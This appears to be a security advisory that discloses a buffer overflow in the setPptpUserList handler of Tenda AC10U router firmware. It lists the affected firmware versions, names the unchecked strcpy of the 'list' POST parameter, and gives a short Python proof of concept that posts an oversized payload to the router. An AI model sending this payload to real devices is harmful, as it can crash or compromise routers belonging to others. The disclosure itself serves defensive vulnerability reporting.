Tenda-AC10U-setPptpUserList

Overview

Firmware download website: https://www.tenda.com.cn/download/detail-2776.html

Affected version

AC10U v1.0 Firmware V15.03.06.48、AC10U v1.0 Firmware V15.03.06.49

Vulnerability details

In the Tenda AC10U v1.0 Firmware V15.03.06.48、AC10U v1.0 Firmware V15.03.06.49 firmware has a buffer overflow vulnerability in the formSetPPTPUserList function. The Var variable receives the list parameter from a POST request and is later passed to the strcpy function. However, since the Since user can control the input of list, the statemeant v4 = strcpy(Var, "~"); can cause a buffer overflow.

POC

import requests

ip = "192.168.1.1"

url = f'http://{ip}/goform/setPptpUserList'
payload = b'a' * 1000
data = {
    'list':payload
}

requests.post(url, data=data)